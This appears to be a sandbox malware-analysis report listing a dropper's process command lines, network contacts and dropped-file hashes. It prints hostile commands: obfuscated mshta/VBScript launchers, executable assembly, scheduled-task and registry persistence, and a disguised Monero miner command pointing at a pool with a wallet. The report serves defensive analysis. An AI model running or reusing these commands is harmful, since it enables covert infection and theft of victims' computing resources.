C:\Windows\SysWOW64\WerFault.exe -u -p 4348 -s 1124
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 1860 -s 744
C:\Windows\SysWOW64\cmd.exe
"C:\Windows\System32\cmd.exe" /Q /C COpy /Y "C:\Users\Admin\AppData\Local\Temp\sfx_123_206.exe" ..\4MCYlgNAW.eXE && StArT ..\4MCYlGNAW.EXE /pni3MGzH3fZ3zm0HbFMiEo11u& IF "" =="" for %z iN ("C:\Users\Admin\AppData\Local\Temp\sfx_123_206.exe") do taskkill -f /Im "%~nXz"
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 420 -p 2220 -ip 2220
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 560 -p 184 -ip 184
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 588 -p 1860 -ip 1860
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 2220 -s 1660
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 1860 -s 812
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 184 -s 1020
C:\Windows\SysWOW64\cmd.exe
"C:\Windows\System32\cmd.exe" /C REG ADD "HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\User Shell Folders" /f /v Startup /t REG_SZ /d C:\Users\Admin\AppData\Local\Temp\e8a12a95fa\
C:\Users\Admin\AppData\Local\Temp\4MCYlgNAW.eXE
..\4MCYlGNAW.EXE /pni3MGzH3fZ3zm0HbFMiEo11u
C:\Windows\SysWOW64\taskkill.exe
taskkill -f /Im "sfx_123_206.exe"
C:\Windows\SysWOW64\schtasks.exe
"C:\Windows\System32\schtasks.exe" /Create /SC MINUTE /MO 1 /TN sqtvvs.exe /TR "C:\Users\Admin\AppData\Local\Temp\e8a12a95fa\sqtvvs.exe" /F
C:\Windows\SysWOW64\mshta.exe
"C:\Windows\System32\mshta.exe" vbScriPt: CLOSe ( CreatEOBjECt ("WScRIpt.sHell" ). rUn ( "CmD.Exe /Q /C COpy /Y ""C:\Users\Admin\AppData\Local\Temp\4MCYlgNAW.eXE"" ..\4MCYlgNAW.eXE && StArT ..\4MCYlGNAW.EXE /pni3MGzH3fZ3zm0HbFMiEo11u& IF ""/pni3MGzH3fZ3zm0HbFMiEo11u"" =="""" for %z iN (""C:\Users\Admin\AppData\Local\Temp\4MCYlgNAW.eXE"") do taskkill -f /Im ""%~nXz"" " , 0 , tRue ))
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 552 -p 1860 -ip 1860
C:\Windows\SysWOW64\reg.exe
REG ADD "HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\User Shell Folders" /f /v Startup /t REG_SZ /d C:\Users\Admin\AppData\Local\Temp\e8a12a95fa\
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 1860 -s 844
C:\Windows\SysWOW64\cmd.exe
"C:\Windows\System32\cmd.exe" /Q /C COpy /Y "C:\Users\Admin\AppData\Local\Temp\4MCYlgNAW.eXE" ..\4MCYlgNAW.eXE && StArT ..\4MCYlGNAW.EXE /pni3MGzH3fZ3zm0HbFMiEo11u& IF "/pni3MGzH3fZ3zm0HbFMiEo11u" =="" for %z iN ("C:\Users\Admin\AppData\Local\Temp\4MCYlgNAW.eXE") do taskkill -f /Im "%~nXz"
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 508 -p 1860 -ip 1860
C:\Windows\SysWOW64\mshta.exe
"C:\Windows\System32\mshta.exe" vbscript: cLoSE ( cREAtEObJect ( "wSCRipT.SHELl" ). Run("Cmd /Q /C eCHo | SeT /p = ""MZ"" > 4~T6.Kj6& cOPy /b /y 4~T6.kJ6 +JJDPQL_.2B+ Z8ISJ6._Nm+oAykH.~~ +kdDPiLEn.~T5 + MZaNA.E ..\Kz_AMsXL.6g & Del /q *& STArT control ..\kZ_AmsXL.6G " ,0, trUE ) )
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 1860 -s 972
C:\Windows\SysWOW64\cmd.exe
"C:\Windows\System32\cmd.exe" /Q /C eCHo | SeT /p = "MZ" > 4~T6.Kj6&cOPy /b /y 4~T6.kJ6+JJDPQL_.2B+Z8ISJ6._Nm+oAykH.~~ +kdDPiLEn.~T5 + MZaNA.E ..\Kz_AMsXL.6g & Del /q *& STArT control ..\kZ_AmsXL.6G
C:\Windows\system32\msiexec.exe
C:\Windows\system32\msiexec.exe /V
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 568 -p 1860 -ip 1860
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /S /D /c" eCHo "
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /S /D /c" SeT /p = "MZ" 1>4~T6.Kj6"
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 1860 -s 1036
C:\Windows\SysWOW64\control.exe
control ..\kZ_AmsXL.6G
C:\Windows\syswow64\MsiExec.exe
C:\Windows\syswow64\MsiExec.exe -Embedding 623D34B2B022F91A49405EE1160A6200 C
C:\Windows\SysWOW64\rundll32.exe
"C:\Windows\system32\rundll32.exe" Shell32.dll,Control_RunDLL ..\kZ_AmsXL.6G
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 564 -p 1860 -ip 1860
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 1860 -s 824
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 552 -p 1860 -ip 1860
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 1860 -s 1192
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 552 -p 1860 -ip 1860
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 1860 -s 1308
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 560 -p 1860 -ip 1860
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 1860 -s 1444
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 556 -p 1860 -ip 1860
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 1860 -s 1664
C:\Windows\SysWOW64\cmd.exe
"C:\Windows\System32\cmd.exe" /c start /I "" "C:\Users\Admin\AppData\Local\Temp\{atcn-sTXCl-CVJ5-URQ2r}\64042477274.exe"
C:\Windows\SysWOW64\cmd.exe
"C:\Windows\System32\cmd.exe" /c start /I "" "C:\Users\Admin\AppData\Local\Temp\{atcn-sTXCl-CVJ5-URQ2r}\38777644794.exe" /mix
C:\Windows\SysWOW64\cmd.exe
"C:\Windows\System32\cmd.exe" /c start /I "" "C:\Users\Admin\AppData\Local\Temp\{atcn-sTXCl-CVJ5-URQ2r}\32748471338.exe" /mix
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 404 -p 1860 -ip 1860
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 1860 -s 2056
C:\Windows\SysWOW64\cmd.exe
"C:\Windows\System32\cmd.exe" /c taskkill /im "setup.exe" /f & erase "C:\Users\Admin\AppData\Local\Temp\setup.exe" & exit
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 404 -p 1860 -ip 1860
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 1860 -s 1804
C:\Windows\SysWOW64\taskkill.exe
taskkill /im "setup.exe" /f
C:\Users\Admin\AppData\Local\Temp\Cleaner Installation.exe
"C:\Users\Admin\AppData\Local\Temp\Cleaner Installation.exe" /i "C:\Users\Admin\AppData\Roaming\Cleaner\Cleaner 1.0.0\install\FD7DF1F\Cleaner Installation.msi" AI_EUIMSI=1 APPDIR="C:\Users\Admin\AppData\Roaming\Cleaner\Cleaner" SECONDSEQUENCE="1" CLIENTPROCESSID="3956" CHAINERUIPROCESSID="3956Chainer" ACTION="INSTALL" EXECUTEACTION="INSTALL" CLIENTUILEVEL="0" ADDLOCAL="MainFeature,RequiredApplication_1" PRIMARYFOLDER="APPDIR" ROOTDRIVE="C:\" AI_PREREQFILES="C:\Users\Admin\AppData\Roaming\Cleaner\Cleaner\prerequisites\RequiredApplication_1\Cleaner%20Installation.exe" AI_PREREQDIRS="C:\Users\Admin\AppData\Roaming\Cleaner" AI_MISSING_PREREQS="Required Application" AI_DETECTED_INTERNET_CONNECTION="1" AI_SETUPEXEPATH="C:\Users\Admin\AppData\Local\Temp\Cleaner Installation.exe" SETUPEXEDIR="C:\Users\Admin\AppData\Local\Temp\" EXE_CMD_LINE="/exenoupdates /forcecleanup /wintime 1733151003 " TARGETDIR="C:\" AI_INSTALL="1" AI_SETUPEXEPATH_ORIGINAL="C:\Users\Admin\AppData\Local\Temp\Cleaner Installation.exe"
C:\Windows\system32\vssvc.exe
C:\Windows\system32\vssvc.exe
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /c schtasks /create /f /sc onlogon /rl highest /tn "services64" /tr '"C:\Users\Admin\AppData\Roaming\services64.exe"' & exit
C:\Windows\system32\schtasks.exe
schtasks /create /f /sc onlogon /rl highest /tn "services64" /tr '"C:\Users\Admin\AppData\Roaming\services64.exe"'
C:\Users\Admin\AppData\Roaming\services64.exe
"C:\Users\Admin\AppData\Roaming\services64.exe"
C:\Users\Admin\AppData\Local\Temp\e8a12a95fa\sqtvvs.exe
C:\Users\Admin\AppData\Local\Temp\e8a12a95fa\sqtvvs.exe
C:\Windows\system32\srtasks.exe
C:\Windows\system32\srtasks.exe ExecuteScopeRestorePoint /WaitForRestorePoint:2
C:\Windows\system32\RunDll32.exe
C:\Windows\system32\RunDll32.exe Shell32.dll,Control_RunDLL ..\kZ_AmsXL.6G
C:\Windows\SysWOW64\rundll32.exe
"C:\Windows\SysWOW64\rundll32.exe" "C:\Windows\SysWOW64\shell32.dll",#44 ..\kZ_AmsXL.6G
C:\Windows\syswow64\MsiExec.exe
C:\Windows\syswow64\MsiExec.exe -Embedding 10EEC0538907FA21A386C6467DA73E10
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /c schtasks /create /f /sc onlogon /rl highest /tn "services64" /tr '"C:\Users\Admin\AppData\Roaming\services64.exe"' & exit
C:\Users\Admin\AppData\Roaming\Microsoft\Libs\sihost64.exe
"C:\Users\Admin\AppData\Roaming\Microsoft\Libs\sihost64.exe"
C:\Windows\system32\schtasks.exe
schtasks /create /f /sc onlogon /rl highest /tn "services64" /tr '"C:\Users\Admin\AppData\Roaming\services64.exe"'
C:\Windows\explorer.exe
C:\Windows\explorer.exe --cinit-find-x -B --algo=rx/0 --asm=auto --cpu-memory-pool=1 --randomx-mode=auto --randomx-no-rdmsr --cuda-bfactor-hint=12 --cuda-bsleep-hint=100 --url=xmr-eu2.nanopool.org:14433 --user=41o1Bi5waqLgbkV653RD7zSYeXSWRu1wnEDzPgFDFwntSnuRx7g4HbHPqNDGS6BW1bget6yyHyrPbBcVsdR6Ebxd843bMuK.add/password --pass= --cpu-max-threads-hint=30 --cinit-remote-config="v4Qq47ngFyBcSyO2uLKc6O4DG/ZgkwoY7/pmBv4ks3wJ7PR9JPsLklOJLkitFc6Y" --cinit-idle-wait=5 --cinit-idle-cpu=70 --tls --cinit-stealth
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 572 -p 4940 -ip 4940
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 4940 -s 488
C:\Users\Admin\AppData\Local\Temp\e59a3a9.exe
"C:\Users\Admin\AppData\Local\Temp\e59a3a9.exe"
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 424 -p 5036 -ip 5036
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 5036 -s 780
C:\Users\Admin\AppData\Local\Temp\e59da68.exe
"C:\Users\Admin\AppData\Local\Temp\e59da68.exe"
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 464 -p 564 -ip 564
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 564 -s 780
Network
| Country | Destination | Domain | Proto |
| US | 8.8.8.8:53 | 8.8.8.8.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 217.106.137.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 88.210.23.2.in-addr.arpa | udp |
| US | 8.8.8.8:53 | cdn.discordapp.com | udp |
| US | 162.159.134.233:443 | cdn.discordapp.com | tcp |
| US | 8.8.8.8:53 | auto-repair-solutions.bar | udp |
| US | 8.8.8.8:53 | 233.134.159.162.in-addr.arpa | udp |
| US | 8.8.8.8:53 | onepremiumstore.bar | udp |
| US | 8.8.8.8:53 | premium-s0ftwar3875.bar | udp |
| US | 8.8.8.8:53 | guidereviews.bar | udp |
| US | 8.8.8.8:53 | iplogger.org | udp |
| US | 8.8.8.8:53 | c.pki.goog | udp |
| US | 172.67.74.161:443 | iplogger.org | tcp |
| GB | 142.250.178.3:80 | c.pki.goog | tcp |
| US | 172.67.74.161:443 | iplogger.org | tcp |
| US | 172.67.74.161:443 | iplogger.org | tcp |
| US | 8.8.8.8:53 | 161.74.67.172.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 3.178.250.142.in-addr.arpa | udp |
| US | 8.8.8.8:53 | ip-api.com | udp |
| US | 208.95.112.1:80 | ip-api.com | tcp |
| US | 8.8.8.8:53 | staticimg.youtuuee.com | udp |
| US | 8.8.8.8:53 | mas.to | udp |
| US | 172.67.166.96:443 | mas.to | tcp |
| US | 172.67.74.161:443 | iplogger.org | tcp |
| US | 8.8.8.8:53 | t.gogamec.com | udp |
| US | 8.8.8.8:53 | abgtt.com | udp |
| US | 8.8.8.8:53 | 1.112.95.208.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 96.166.67.172.in-addr.arpa | udp |
| RU | 185.215.113.25:80 | 185.215.113.25 | tcp |
| RU | 185.215.113.25:80 | 185.215.113.25 | tcp |
| US | 8.8.8.8:53 | 226.21.18.104.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 25.113.215.185.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 133.66.101.151.in-addr.arpa | udp |
| US | 162.159.134.233:443 | cdn.discordapp.com | tcp |
| US | 172.67.74.161:443 | iplogger.org | tcp |
| US | 8.8.8.8:53 | gcl-page.biz | udp |
| US | 8.8.8.8:53 | t.gogamec.com | udp |
| US | 8.8.8.8:53 | staticimg.youtuuee.com | udp |
| US | 8.8.8.8:53 | paybiz.herokuapp.com | udp |
| US | 34.201.81.34:443 | paybiz.herokuapp.com | tcp |
| UA | 194.145.227.161:80 | 194.145.227.161 | tcp |
| US | 8.8.8.8:53 | 34.81.201.34.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 16.23.32.13.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 161.227.145.194.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 41.38.245.18.in-addr.arpa | udp |
| US | 162.159.134.233:443 | cdn.discordapp.com | tcp |
| US | 8.8.8.8:53 | ocsp.r2m03.amazontrust.com | udp |
| DE | 13.224.191.223:80 | ocsp.r2m03.amazontrust.com | tcp |
| US | 8.8.8.8:53 | 223.191.224.13.in-addr.arpa | udp |
| US | 172.67.74.161:443 | iplogger.org | tcp |
| US | 8.8.8.8:53 | gcl-page.biz | udp |
| US | 172.67.74.161:80 | iplogger.org | tcp |
| US | 8.8.8.8:53 | staticimg.youtuuee.com | udp |
| US | 8.8.8.8:53 | t.gogamec.com | udp |
| US | 172.67.74.161:443 | iplogger.org | tcp |
| US | 162.159.134.233:443 | cdn.discordapp.com | tcp |
| US | 34.201.81.34:443 | paybiz.herokuapp.com | tcp |
| US | 8.8.8.8:53 | s3.us-central-1.wasabisys.com | udp |
| US | 38.91.42.101:443 | s3.us-central-1.wasabisys.com | tcp |
| US | 162.159.134.233:443 | cdn.discordapp.com | tcp |
| US | 172.67.74.161:443 | iplogger.org | tcp |
| US | 8.8.8.8:53 | staticimg.youtuuee.com | udp |
| US | 8.8.8.8:53 | t.gogamec.com | udp |
| US | 8.8.8.8:53 | 101.42.91.38.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 95.221.229.192.in-addr.arpa | udp |
| US | 162.159.134.233:443 | cdn.discordapp.com | tcp |
| US | 172.67.74.161:443 | iplogger.org | tcp |
| US | 8.8.8.8:53 | t.gogamec.com | udp |
| US | 8.8.8.8:53 | staticimg.youtuuee.com | udp |
| US | 162.159.134.233:443 | cdn.discordapp.com | tcp |
| US | 162.159.134.233:443 | cdn.discordapp.com | tcp |
| US | 172.67.74.161:443 | iplogger.org | tcp |
| US | 8.8.8.8:53 | staticimg.youtuuee.com | udp |
| US | 8.8.8.8:53 | t.gogamec.com | udp |
| US | 162.159.134.233:443 | cdn.discordapp.com | tcp |
| US | 8.8.8.8:53 | 56.163.245.4.in-addr.arpa | udp |
| US | 172.67.74.161:443 | iplogger.org | tcp |
| US | 8.8.8.8:53 | staticimg.youtuuee.com | udp |
| US | 8.8.8.8:53 | t.gogamec.com | udp |
| US | 8.8.8.8:53 | 171.39.242.20.in-addr.arpa | udp |
| US | 162.159.134.233:443 | cdn.discordapp.com | tcp |
| US | 8.8.8.8:53 | 18.134.221.88.in-addr.arpa | udp |
| US | 162.159.134.233:443 | cdn.discordapp.com | tcp |
| US | 172.67.74.161:443 | iplogger.org | tcp |
| US | 8.8.8.8:53 | staticimg.youtuuee.com | udp |
| US | 8.8.8.8:53 | t.gogamec.com | udp |
| US | 162.159.134.233:443 | cdn.discordapp.com | tcp |
| US | 172.67.74.161:443 | iplogger.org | tcp |
| US | 8.8.8.8:53 | staticimg.youtuuee.com | udp |
| US | 8.8.8.8:53 | t.gogamec.com | udp |
| US | 162.159.134.233:443 | cdn.discordapp.com | tcp |
| US | 8.8.8.8:53 | 72.32.126.40.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 57.110.18.2.in-addr.arpa | udp |
| US | 162.159.134.233:443 | cdn.discordapp.com | tcp |
| US | 8.8.8.8:53 | staticimg.youtuuee.com | udp |
| US | 172.67.74.161:443 | iplogger.org | tcp |
| US | 8.8.8.8:53 | t.gogamec.com | udp |
| US | 8.8.8.8:53 | 97.17.167.52.in-addr.arpa | udp |
| US | 162.159.134.233:443 | cdn.discordapp.com | tcp |
| US | 8.8.8.8:53 | paybiz.herokuapp.com | udp |
| US | 54.208.186.182:443 | paybiz.herokuapp.com | tcp |
| US | 8.8.8.8:53 | staticimg.youtuuee.com | udp |
| US | 8.8.8.8:53 | t.gogamec.com | udp |
| US | 172.67.74.161:443 | iplogger.org | tcp |
| US | 8.8.8.8:53 | 182.186.208.54.in-addr.arpa | udp |
| US | 162.159.134.233:443 | cdn.discordapp.com | tcp |
| US | 8.8.8.8:53 | staticimg.youtuuee.com | udp |
| US | 8.8.8.8:53 | t.gogamec.com | udp |
| US | 172.67.74.161:443 | iplogger.org | tcp |
| US | 162.159.134.233:443 | cdn.discordapp.com | tcp |
| US | 162.159.134.233:443 | cdn.discordapp.com | tcp |
| US | 8.8.8.8:53 | 172.214.232.199.in-addr.arpa | udp |
| US | 34.201.81.34:443 | paybiz.herokuapp.com | tcp |
| US | 8.8.8.8:53 | staticimg.youtuuee.com | udp |
| US | 8.8.8.8:53 | t.gogamec.com | udp |
| US | 172.67.74.161:443 | iplogger.org | tcp |
| US | 162.159.134.233:443 | cdn.discordapp.com | tcp |
| US | 8.8.8.8:53 | sanctam.net | udp |
| US | 8.8.8.8:53 | github.com | udp |
| GB | 20.26.156.215:443 | github.com | tcp |
| US | 8.8.8.8:53 | raw.githubusercontent.com | udp |
| US | 185.199.108.133:443 | raw.githubusercontent.com | tcp |
| US | 8.8.8.8:53 | staticimg.youtuuee.com | udp |
| US | 8.8.8.8:53 | t.gogamec.com | udp |
| US | 172.67.74.161:443 | iplogger.org | tcp |
| US | 162.159.134.233:443 | cdn.discordapp.com | tcp |
| US | 8.8.8.8:53 | 215.156.26.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 133.108.199.185.in-addr.arpa | udp |
| US | 8.8.8.8:53 | xmr-eu2.nanopool.org | udp |
| NL | 51.15.61.114:14433 | xmr-eu2.nanopool.org | tcp |
| US | 8.8.8.8:53 | pastebin.com | udp |
| US | 172.67.19.24:443 | pastebin.com | tcp |
| US | 8.8.8.8:53 | xmr-eu1.nanopool.org | udp |
| DE | 162.19.224.121:14433 | xmr-eu1.nanopool.org | tcp |
| US | 8.8.8.8:53 | 114.61.15.51.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 24.19.67.172.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 121.224.19.162.in-addr.arpa | udp |
| US | 162.159.134.233:443 | cdn.discordapp.com | tcp |
| US | 8.8.8.8:53 | staticimg.youtuuee.com | udp |
| US | 8.8.8.8:53 | t.gogamec.com | udp |
| US | 172.67.74.161:443 | iplogger.org | tcp |
| US | 162.159.134.233:443 | cdn.discordapp.com | tcp |
| US | 8.8.8.8:53 | t.gogamec.com | udp |
| US | 8.8.8.8:53 | staticimg.youtuuee.com | udp |
| US | 172.67.74.161:443 | iplogger.org | tcp |
| US | 162.159.134.233:443 | cdn.discordapp.com | tcp |
| US | 162.159.134.233:443 | cdn.discordapp.com | tcp |
| US | 8.8.8.8:53 | t.gogamec.com | udp |
| US | 8.8.8.8:53 | staticimg.youtuuee.com | udp |
| US | 172.67.74.161:443 | iplogger.org | tcp |
| US | 162.159.134.233:443 | cdn.discordapp.com | tcp |
| US | 8.8.8.8:53 | t.gogamec.com | udp |
| US | 8.8.8.8:53 | staticimg.youtuuee.com | udp |
| US | 172.67.74.161:443 | iplogger.org | tcp |
| US | 162.159.134.233:443 | cdn.discordapp.com | tcp |
| US | 8.8.8.8:53 | t.gogamec.com | udp |
| US | 162.159.134.233:443 | cdn.discordapp.com | tcp |
| US | 8.8.8.8:53 | staticimg.youtuuee.com | udp |
| US | 8.8.8.8:53 | 19.229.111.52.in-addr.arpa | udp |
| US | 172.67.74.161:443 | iplogger.org | tcp |
| US | 162.159.134.233:443 | cdn.discordapp.com | tcp |
| US | 8.8.8.8:53 | t.gogamec.com | udp |
| US | 8.8.8.8:53 | staticimg.youtuuee.com | udp |
| US | 172.67.74.161:443 | iplogger.org | tcp |
| US | 162.159.134.233:443 | cdn.discordapp.com | tcp |
| US | 8.8.8.8:53 | staticimg.youtuuee.com | udp |
| US | 8.8.8.8:53 | t.gogamec.com | udp |
| US | 162.159.134.233:443 | cdn.discordapp.com | tcp |
| US | 172.67.74.161:443 | iplogger.org | tcp |
| US | 8.8.8.8:53 | 13.86.106.20.in-addr.arpa | udp |
| US | 162.159.134.233:443 | cdn.discordapp.com | tcp |
| US | 8.8.8.8:53 | t.gogamec.com | udp |
| US | 8.8.8.8:53 | staticimg.youtuuee.com | udp |
| US | 172.67.74.161:443 | iplogger.org | tcp |
| US | 162.159.134.233:443 | cdn.discordapp.com | tcp |
| US | 72.84.118.132:8080 | tcp | |
| US | 162.159.134.233:443 | cdn.discordapp.com | tcp |
| US | 8.8.8.8:53 | staticimg.youtuuee.com | udp |
| US | 8.8.8.8:53 | t.gogamec.com | udp |
| US | 172.67.74.161:443 | iplogger.org | tcp |
| US | 162.159.134.233:443 | cdn.discordapp.com | tcp |
| US | 8.8.8.8:53 | staticimg.youtuuee.com | udp |
| US | 8.8.8.8:53 | t.gogamec.com | udp |
| US | 162.159.134.233:443 | cdn.discordapp.com | tcp |
| US | 172.67.74.161:443 | iplogger.org | tcp |
| US | 162.159.134.233:443 | cdn.discordapp.com | tcp |
| US | 8.8.8.8:53 | t.gogamec.com | udp |
| US | 8.8.8.8:53 | staticimg.youtuuee.com | udp |
| US | 172.67.74.161:443 | iplogger.org | tcp |
| US | 162.159.134.233:443 | cdn.discordapp.com | tcp |
| US | 8.8.8.8:53 | t.gogamec.com | udp |
| US | 8.8.8.8:53 | staticimg.youtuuee.com | udp |
| US | 162.159.134.233:443 | cdn.discordapp.com | tcp |
| US | 172.67.74.161:443 | iplogger.org | tcp |
| US | 162.159.134.233:443 | cdn.discordapp.com | tcp |
| US | 8.8.8.8:53 | staticimg.youtuuee.com | udp |
| US | 8.8.8.8:53 | t.gogamec.com | udp |
| US | 172.67.74.161:443 | iplogger.org | tcp |
| US | 162.159.134.233:443 | cdn.discordapp.com | tcp |
| US | 8.8.8.8:53 | t.gogamec.com | udp |
| US | 8.8.8.8:53 | staticimg.youtuuee.com | udp |
| US | 162.159.134.233:443 | cdn.discordapp.com | tcp |
| US | 172.67.74.161:443 | iplogger.org | tcp |
| US | 162.159.134.233:443 | cdn.discordapp.com | tcp |
| US | 8.8.8.8:53 | t.gogamec.com | udp |
| US | 8.8.8.8:53 | staticimg.youtuuee.com | udp |
| US | 172.67.74.161:443 | iplogger.org | tcp |
| US | 162.159.134.233:443 | cdn.discordapp.com | tcp |
| US | 8.8.8.8:53 | t.gogamec.com | udp |
| US | 8.8.8.8:53 | staticimg.youtuuee.com | udp |
Files
memory/1548-0-0x000000007456E000-0x000000007456F000-memory.dmp
memory/1548-1-0x0000000000E90000-0x000000000161E000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\Chrome 5.exe
| MD5 | 93460c75de91c3601b4a47d2b99d8f94 |
| SHA1 | f2e959a3291ef579ae254953e62d098fe4557572 |
| SHA256 | 0fdba84fe8ed2cf97023c544d3f0807dbb12840c8e7d445a3a4f55174d78b5b2 |
| SHA512 | 4370ae1a1fc10c91593839c51d0fbae5c0838692f95e03cac315882b026e70817b238f7fe7d9897049856469b038acc8ccfd73aae1af5775bfef35bde2bf7856 |
C:\Users\Admin\AppData\Local\Temp\Firstoffer.exe
| MD5 | 568eaf0936546f3a4d478f0c249a68ff |
| SHA1 | 9e1a778d77d10955e7dc5af123c26e839b253838 |
| SHA256 | 623f08634b1a481b993c2c222f9cf1c87332d946ec7ebc6e2a49ea580f3502de |
| SHA512 | ffc5d1b53dbd7deaeded67a78810b9ffe2bf6a08307f79f0430cb9c4abc5df55fe01f35d33ec3d84b51de3e4bfed3e387eddc38198c0eaf34115edfacaaf98a9 |
memory/4524-17-0x00007FF909133000-0x00007FF909135000-memory.dmp
memory/4524-19-0x0000000000BF0000-0x0000000000C00000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\DownFlSetup110.exe
| MD5 | 72f96cfde8a3c2abd3f38d8da2cfe889 |
| SHA1 | 72bbf2efd229601d52cce10cfd34fa4229520291 |
| SHA256 | 5b1568f481160da68223eeddcc201b3b0d03b9dddc85e4494e92ee6e919ce10d |
| SHA512 | 36e01f7216d9a5140c28350f95e7bffbfdb57d6a9b00b1e3df88587da9fcd772ac64edf021875e284039e21aaefaf7ec3595899cacfc8396933997e19fd734b9 |
C:\Users\Admin\AppData\Local\Temp\inst001.exe
| MD5 | 23bcdc132d1f2aaf8d248b6a5bd21801 |
| SHA1 | 2153acec77f4a57c621a3e38d523eb6df9b29134 |
| SHA256 | a7cb6d861c75f36c32cb5a304b0d8d84b5bc0bedd7da2eb942e4d67288f7123b |
| SHA512 | d9684eab46e5431bc69b70154bbef7a3126f0719a80792f120a3a436e6f4f23cf1229d4b4293c1aff4202ab748144ce19dbc4c39f74f631e1b6f9336259f02db |
C:\Users\Admin\AppData\Local\Temp\install.exe
| MD5 | 28fc3ef97675adb779a68c89e098e7ba |
| SHA1 | 4c8e04317d41426963a310230adb77c7c5ad67fd |
| SHA256 | 06fe5043a987831fcb4bb914b6bc939740f363f920d5145f3cd697a300e1c64d |
| SHA512 | 9355b28f9ce31da2afa2b5676b52032b92c5201c09cd506eadf89c9237f6114c13c0e0cac1fa65fff1ca6cf3c4165bbc148f1a13494ab3d59ba90fea354766ec |
memory/100-53-0x000000007456E000-0x000000007456F000-memory.dmp
memory/100-46-0x00000000004E0000-0x00000000004F8000-memory.dmp
memory/816-58-0x0000000000010000-0x0000000000051000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\setup.exe
| MD5 | 90cfe790d93388738929453e0b8a976e |
| SHA1 | 0b8dd0ae4070259991b0de105ec3390afbb2fb44 |
| SHA256 | 2ded24319d6e74ee1b9ad2517fbfd1ceceeca9b854d34b722481cbc694270831 |
| SHA512 | 2a9b0fd6a3fe152f8cd5cb02703be679918949a9bbc86f90cd4cdb8bd68cee716561a80541a4620a20f034d04eef8e5ec9edae2c1969c45ab1fd03fc616e7162 |
memory/3608-72-0x0000000000FB0000-0x0000000000FF1000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\7.exe
| MD5 | 6a16fdad888507df0b938dd3421cc7cf |
| SHA1 | d60d3a5959349f1df9e83292003e547828535ea3 |
| SHA256 | 1bad2fb46b08904f12a4ea96ce3cf0582f9995c16a26143c16b858702793e166 |
| SHA512 | c6877e5b5b58730e188b441a67099605d2c6ae5dd94b2a0281534771555a09d144f952878e4ade462f33604e96a7f66dab5f18689b72d4ff589952784e1f9e16 |
